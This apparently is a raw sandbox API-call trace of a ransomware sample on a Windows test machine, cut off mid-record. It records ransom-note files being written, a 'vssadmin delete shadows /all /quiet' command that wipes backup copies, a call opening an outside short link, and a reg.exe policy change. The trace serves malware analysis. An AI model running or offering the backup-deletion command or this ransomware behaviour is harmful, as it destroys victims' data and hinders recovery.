halpmcxz\\videos\\j-pqgtuq9vexmnb4exj\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e4 [0109.492] GetFileType (hFile=0x2e4) returned 0x1 [0109.492] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e400) returned 1 [0109.492] GetFileType (hFile=0x2e4) returned 0x1 [0109.492] WriteFile (in: hFile=0x2e4, lpBuffer=0x2396078*, nNumberOfBytesToWrite=0x4bc, lpNumberOfBytesWritten=0x12e538, lpOverlapped=0x0 | out: lpBuffer=0x2396078*, lpNumberOfBytesWritten=0x12e538*=0x4bc, lpOverlapped=0x0) returned 1 [0109.494] CloseHandle (hObject=0x2e4) returned 1 [0109.494] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HELP_DECRYPT_YOUR_FILES.txt", nBufferLength=0x105, lpBuffer=0x12e0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HELP_DECRYPT_YOUR_FILES.txt", lpFilePart=0x0) returned 0x40 [0109.494] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x12e580) returned 1 [0109.494] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HELP_DECRYPT_YOUR_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e4 [0109.495] GetFileType (hFile=0x2e4) returned 0x1 [0109.495] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x12e4f0) returned 1 [0109.495] GetFileType (hFile=0x2e4) returned 0x1 [0109.495] WriteFile (in: hFile=0x2e4, lpBuffer=0x2399bb8*, nNumberOfBytesToWrite=0x4bc, lpNumberOfBytesWritten=0x12e628, lpOverlapped=0x0 | out: lpBuffer=0x2399bb8*, lpNumberOfBytesWritten=0x12e628*=0x4bc, lpOverlapped=0x0) returned 1 [0109.498] CloseHandle (hObject=0x2e4) returned 1 [0109.499] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0109.499] CreatePipe (in: hReadPipe=0x12e770, hWritePipe=0x12e768, lpPipeAttributes=0x12e660, nSize=0x0 | out: hReadPipe=0x12e770*=0x2e4, hWritePipe=0x12e768*=0x33c) returned 1 [0109.499] GetCurrentProcess () returned 0xffffffffffffffff [0109.500] GetCurrentProcess () returned 0xffffffffffffffff [0109.500] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x2e4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12e7b0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x12e7b0*=0x338) returned 1 [0109.500] CloseHandle (hObject=0x2e4) returned 1 [0109.500] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0109.500] CoTaskMemAlloc (cb=0x20e) returned 0xac4ec0 [0109.500] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0xac4ec0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0109.500] CoTaskMemFree (pv=0xac4ec0) [0109.500] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"cmd.exe\" /c vssadmin.exe delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x12e600*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x33c, hStdError=0x0), lpProcessInformation=0x239b058 | out: lpCommandLine="\"cmd.exe\" /c vssadmin.exe delete shadows /all /quiet", lpProcessInformation=0x239b058*(hProcess=0x340, hThread=0x2e4, dwProcessId=0xb24, dwThreadId=0xb6c)) returned 1 [0109.518] CloseHandle (hObject=0x33c) returned 1 [0109.518] GetFileType (hFile=0x338) returned 0x3 [0109.519] CloseHandle (hObject=0x2e4) returned 1 [0113.203] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0xad19d0 [0113.203] ShellExecuteExW (in: pExecInfo=0x239eb00*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="https://2no.co/1SHYt7", lpParameters=0x0, lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x239eb00*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="https://2no.co/1SHYt7", lpParameters=0x0, lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0127.357] LocalFree (hMem=0xad19d0) returned 0x0 [0127.361] CoGetContextToken (in: pToken=0x12f5f0 | out: pToken=0x12f5f0) returned 0x0 [0127.361] CObjectContext::QueryInterface () returned 0x0 [0127.362] CObjectContext::GetCurrentThreadType () returned 0x0 [0127.362] Release () returned 0x0 [0127.363] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x13880, cHandles=0x1, pHandles=0x1ea5a0*=0x8c, lpdwindex=0x12f3e4 | out: lpdwindex=0x12f3e4) returned 0x0 Thread: id = 2 os_tid = 0x48c Thread: id = 3 os_tid = 0x7c4 [0048.679] CoGetContextToken (in: pToken=0x1a6ef940 | out: pToken=0x1a6ef940) returned 0x800401f0 [0048.680] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0092.024] CloseHandle (hObject=0x2e4) returned 1 [0092.035] CloseHandle (hObject=0x300) returned 1 [0092.036] CloseHandle (hObject=0x320) returned 1 [0127.413] CloseHandle (hObject=0x338) returned 1 [0127.414] CloseHandle (hObject=0x340) returned 1 [0127.425] CloseHandle (hObject=0x2d4) returned 1 [0127.426] UnmapViewOfFile (lpBaseAddress=0xc20000) returned 1 [0127.430] SleepEx (dwMilliseconds=0xffffffff, bAlertable=0) Thread: id = 4 os_tid = 0x640 Thread: id = 5 os_tid = 0x664 Thread: id = 6 os_tid = 0x4fc Thread: id = 31 os_tid = 0xb78 Thread: id = 65 os_tid = 0xb5c [0127.432] SleepEx (dwMilliseconds=0x14, bAlertable=0) Thread: id = 66 os_tid = 0x1c4 Process: id = "2" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x41409000" os_pid = "0x35c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x7a4" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" C:\\Windows\\System32\\cmd.exe /k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 1 /f" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 7 os_tid = 0x414 [0071.362] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1eff30 | out: lpSystemTimeAsFileTime=0x1eff30*(dwLowDateTime=0x7a797b80, dwHighDateTime=0x1d6b3a2)) [0071.362] GetCurrentProcessId () returned 0x35c [0071.362] GetCurrentThreadId () returned 0x414 [0071.362] GetTickCount () returned 0x1147a20 [0071.362] QueryPerformanceCounter (in: lpPerformanceCount=0x1eff38 | out: lpPerformanceCount=0x1eff38*=18846805205) returned 1 [0071.367] GetModuleHandleW (lpModuleName=0x0) returned 0x4a680000 [0071.367] __set_app_type (_Type=0x1) [0071.367] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a6a7810) returned 0x0 [0071.367] __getmainargs (in: _Argc=0x4a6ca608, _Argv=0x4a6ca618, _Env=0x4a6ca610, _DoWildCard=0, _StartInfo=0x4a6ae0f4 | out: _Argc=0x4a6ca608, _Argv=0x4a6ca618, _Env=0x4a6ca610) returned 0 [0071.368] GetCurrentThreadId () returned 0x414 [0071.368] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x414) returned 0x3c [0071.373] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0071.373] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0071.374] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0071.374] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0071.374] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1efec8 | out: phkResult=0x1efec8*=0x0) returned 0x2 [0071.374] VirtualQuery (in: lpAddress=0x1efeb0, lpBuffer=0x1efe30, dwLength=0x30 | out: lpBuffer=0x1efe30*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0071.374] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1efe30, dwLength=0x30 | out: lpBuffer=0x1efe30*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0071.374] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1efe30, dwLength=0x30 | out: lpBuffer=0x1efe30*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0071.374] VirtualQuery (in: lpAddress=0xf4000, lpBuffer=0x1efe30, dwLength=0x30 | out: lpBuffer=0x1efe30*(BaseAddress=0xf4000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0071.374] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1efe30, dwLength=0x30 | out: lpBuffer=0x1efe30*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0071.374] GetConsoleOutputCP () returned 0x1b5 [0071.375] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a6bbfe0 | out: lpCPInfo=0x4a6bbfe0) returned 1 [0071.375] SetConsoleCtrlHandler (HandlerRoutine=0x4a6a3184, Add=1) returned 1 [0071.375] _get_osfhandle (_FileHandle=1) returned 0x7 [0071.375] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0071.375] _get_osfhandle (_FileHandle=1) returned 0x7 [0071.375] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a6ae194 | out: lpMode=0x4a6ae194) returned 1 [0071.376] _get_osfhandle (_FileHandle=1) returned 0x7 [0071.376] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0071.376] _get_osfhandle (_FileHandle=0) returned 0x3 [0071.376] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a6ae198 | out: lpMode=0x4a6ae198) returned 1 [0071.376] _get_osfhandle (_FileHandle=0) returned 0x3 [0071.376] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0071.377] GetEnvironmentStringsW () returned 0x3b8c30* [0071.377] GetProcessHeap () returned 0x3a0000 [0071.377] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xa7c) returned 0x3b96c0 [0071.377] FreeEnvironmentStringsW (penv=0x3b8c30) returned 1 [0071.377] GetProcessHeap () returned 0x3a0000 [0071.377] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x8) returned 0x3b8ab0 [0071.377] GetEnvironmentStringsW () returned 0x3b8c30* [0071.377] GetProcessHeap () returned 0x3a0000 [0071.377] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xa7c) returned 0x3ba150 [0071.377] FreeEnvironmentStringsW (penv=0x3b8c30) returned 1 [0071.377] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eed88 | out: phkResult=0x1eed88*=0x44) returned 0x0 [0071.377] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eed80, lpData=0x1eeda0, lpcbData=0x1eed84*=0x1000 | out: lpType=0x1eed80*=0x0, lpData=0x1eeda0*=0x18, lpcbData=0x1eed84*=0x1000) returned 0x2 [0071.377] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eed80, lpData=0x1eeda0, lpcbData=0x1eed84*=0x1000 | out: lpType=0x1eed80*=0x4, lpData=0x1eeda0*=0x1, lpcbData=0x1eed84*=0x4) returned 0x0 [0071.377] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eed80, lpData=0x1eeda0, lpcbData=0x1eed84*=0x1000 | out: lpType=0x1eed80*=0x0, lpData=0x1eeda0*=0x1, lpcbData=0x1eed84*=0x1000) returned 0x2 [0071.378] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eed80, lpData=0x1eeda0, lpcbData=0x1eed84*=0x1000 | out: lpType=0x1eed80*=0x4, lpData=0x1eeda0*=0x0, lpcbData=0x1eed84*=0x4) returned 0x0 [0071.378] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eed80, lpData=0x1eeda0, lpcbData=0x1eed84*=0x1000 | out: lpType=0x1eed80*=0x4, lpData=0x1eeda0*=0x40, lpcbData=0x1eed84*=0x4) returned 0x0 [0071.378] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eed80, lpData=0x1eeda0, lpcbData=0x1eed84*=0x1000 | out: lpType=0x1eed80*=0x4, lpData=0x1eeda0*=0x40, lpcbData=0x1eed84*=0x4) returned 0x0 [0071.378] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eed80, lpData=0x1eeda0, lpcbData=0x1eed84*=0x1000 | out: lpType=0x1eed80*=0x0, lpData=0x1eeda0*=0x40, lpcbData=0x1eed84*=0x1000) returned 0x2 [0071.378] RegCloseKey (hKey=0x44) returned 0x0 [0071.378] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eed88 | out: phkResult=0x1eed88*=0x44) returned 0x0 [0071.378] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eed80, lpData=0x1eeda0, lpcbData=0x1eed84*=0x1000 | out: lpType=0x1eed80*=0x0, lpData=0x1eeda0*=0x40, lpcbData=0x1eed84*=0x1000) returned 0x2 [0071.378] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eed80, lpData=0x1eeda0, lpcbData=0x1eed84*=0x1000 | out: lpType=0x1eed80*=0x4, lpData=0x1eeda0*=0x1, lpcbData=0x1eed84*=0x4) returned 0x0 [0071.378] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eed80, lpData=0x1eeda0, lpcbData=0x1eed84*=0x1000 | out: lpType=0x1eed80*=0x0, lpData=0x1eeda0*=0x1, lpcbData=0x1eed84*=0x1000) returned 0x2 [0071.378] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eed80, lpData=0x1eeda0, lpcbData=0x1eed84*=0x1000 | out: lpType=0x1eed80*=0x4, lpData=0x1eeda0*=0x0, lpcbData=0x1eed84*=0x4) returned 0x0 [0071.378] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eed80, lpData=0x1eeda0, lpcbData=0x1eed84*=0x1000 | out: lpType=0x1eed80*=0x4, lpData=0x1eeda0*=0x9, lpcbData=0x1eed84*=0x4) returned 0x0 [0071.378] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eed80, lpData=0x1eeda0, lpcbData=0x1eed84*=0x1000 | out: lpType=0x1eed80*=0x4, lpData=0x1eeda0*=0x9, lpcbData=0x1eed84*=0x4) returned 0x0 [0071.378] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eed80, lpData=0x1eeda0, lpcbData=0x1eed84*=0x1000 | out: lpType=0x1eed80*=0x0, lpData=0x1eeda0*=0x9, lpcbData=0x1eed84*=0x1000) returned 0x2 [0071.379] RegCloseKey (hKey=0x44) returned 0x0 [0071.379] time (in: timer=0x0 | out: timer=0x0) returned 0x5fa44603 [0071.379] srand (_Seed=0x5fa44603) [0071.379] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" C:\\Windows\\System32\\cmd.exe /k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 1 /f" [0071.379] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" C:\\Windows\\System32\\cmd.exe /k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 1 /f" [0071.379] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a6bc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0071.379] GetProcessHeap () returned 0x3a0000 [0071.380] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x218) returned 0x3babe0 [0071.380] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3babf0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0071.380] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a6af360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0071.380] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a6af360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0071.380] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a6af360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0071.380] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0071.380] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0071.380] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0071.380] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0071.380] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0071.380] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0071.380] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0071.380] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0071.380] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0071.380] GetProcessHeap () returned 0x3a0000 [0071.381] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b96c0 | out: hHeap=0x3a0000) returned 1 [0071.381] GetEnvironmentStringsW () returned 0x3b8c30* [0071.381] GetProcessHeap () returned 0x3a0000 [0071.381] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xa94) returned 0x3bb8a0 [0071.381] FreeEnvironmentStringsW (penv=0x3b8c30) returned 1 [0071.381] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a6af360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0071.381] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a6af360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0071.381] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0071.381] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0071.381] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0071.381] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0071.381] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0071.381] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0071.381] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0071.381] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0071.381] GetProcessHeap () returned 0x3a0000 [0071.381] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x5c) returned 0x3a1320 [0071.381] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1efb90 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0071.381] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x1efb90, lpFilePart=0x1efb70 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1efb70*="Desktop") returned 0x25 [0071.382] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0071.382] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef8a0 | out: lpFindFileData=0x1ef8a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xc90000c9, cFileName="Users", cAlternateFileName="")) returned 0x3a1390 [0071.382] FindClose (in: hFindFile=0x3a1390 | out: hFindFile=0x3a1390) returned 1 [0071.382] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x1ef8a0 | out: lpFindFileData=0x1ef8a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xc90000c9, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x3a1390 [0071.382] FindClose (in: hFindFile=0x3a1390 | out: hFindFile=0x3a1390) returned 1 [0071.382] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0071.382] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x1ef8a0 | out: lpFindFileData=0x1ef8a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6db47080, ftLastAccessTime.dwHighDateTime=0x1d6b3a2, ftLastWriteTime.dwLowDateTime=0x6db47080, ftLastWriteTime.dwHighDateTime=0x1d6b3a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xc90000c9, cFileName="Desktop", cAlternateFileName="")) returned 0x3a1390 [0071.383] FindClose (in: hFindFile=0x3a1390 | out: hFindFile=0x3a1390) returned 1 [0071.383] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0071.383] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0071.383] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0071.383] GetProcessHeap () returned 0x3a0000 [0071.383] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bb8a0 | out: hHeap=0x3a0000) returned 1 [0071.383] GetEnvironmentStringsW () returned 0x3b8c30* [0071.383] GetProcessHeap () returned 0x3a0000 [0071.383] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xae8) returned 0x3bae00 [0071.383] FreeEnvironmentStringsW (penv=0x3b8c30) returned 1 [0071.383] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a6bc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0071.383] GetProcessHeap () returned 0x3a0000 [0071.383] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3a1320 | out: hHeap=0x3a0000) returned 1 [0071.383] GetProcessHeap () returned 0x3a0000 [0071.383] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x4016) returned 0x3bce30 [0071.384] GetProcessHeap () returned 0x3a0000 [0071.384] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x112) returned 0x3bb8f0 [0071.384] GetProcessHeap () returned 0x3a0000 [0071.384] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bce30 | out: hHeap=0x3a0000) returned 1 [0071.384] GetConsoleOutputCP () returned 0x1b5 [0071.384] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a6bbfe0 | out: lpCPInfo=0x4a6bbfe0) returned 1 [0071.384] GetUserDefaultLCID () returned 0x409 [0071.385] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a6b7b50, cchData=8 | out: lpLCData=":") returned 2 [0071.385] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1efca0, cchData=128 | out: lpLCData="0") returned 2 [0071.385] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1efca0, cchData=128 | out: lpLCData="0") returned 2 [0071.385] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1efca0, cchData=128 | out: lpLCData="1") returned 2 [0071.385] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a6ca740, cchData=8 | out: lpLCData="/") returned 2 [0071.385] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a6ca4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0071.386] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a6ca460, cchData=32 | out: lpLCData="Tue") returned 4 [0071.386] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a6ca420, cchData=32 | out: lpLCData="Wed") returned 4 [0071.386] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a6ca3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0071.386] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a6ca3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0071.386] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a6ca360, cchData=32 | out: lpLCData="Sat") returned 4 [0071.386] GetLocaleInfoW (in: 